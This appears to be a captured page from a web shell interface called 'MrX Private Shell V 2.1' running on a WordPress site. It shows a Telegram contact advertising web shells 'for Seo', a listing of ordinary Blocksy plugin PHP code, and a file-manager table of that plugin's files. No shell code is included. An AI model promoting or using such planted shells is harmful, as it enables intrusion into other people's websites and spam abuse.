__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
function blc_exts_get_preliminary_config($ext = null, $args = []) {
$args = wp_parse_args($args, [
'only_billing_data' => false
]);
$data = blc_get_variables_from_file(
dirname(__FILE__) . '/exts-configs.php',
[
'data' => []
],
[
'only_billing_data' => $args['only_billing_data']
]
);
$data = $data['data'];
if (! $ext || ! isset($data[$ext])) {
return $data;
}
return $data[$ext];
}
function blc_get_ext($id, $args = []) {
if (! \Blocksy\Plugin::instance()->extensions) {
return null;
}
return \Blocksy\Plugin::instance()->extensions->get($id, $args);
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| exts-configs.php | File | 23.18 KB | 0775 |
|
| exts.php | File | 601 B | 0775 |
|
| helpers.php | File | 10.57 KB | 0775 |
|
| request.php | File | 3.14 KB | 0775 |
|
| theme-functions.php | File | 2.32 KB | 0775 |
|
| woo.php | File | 354 B | 0775 |
|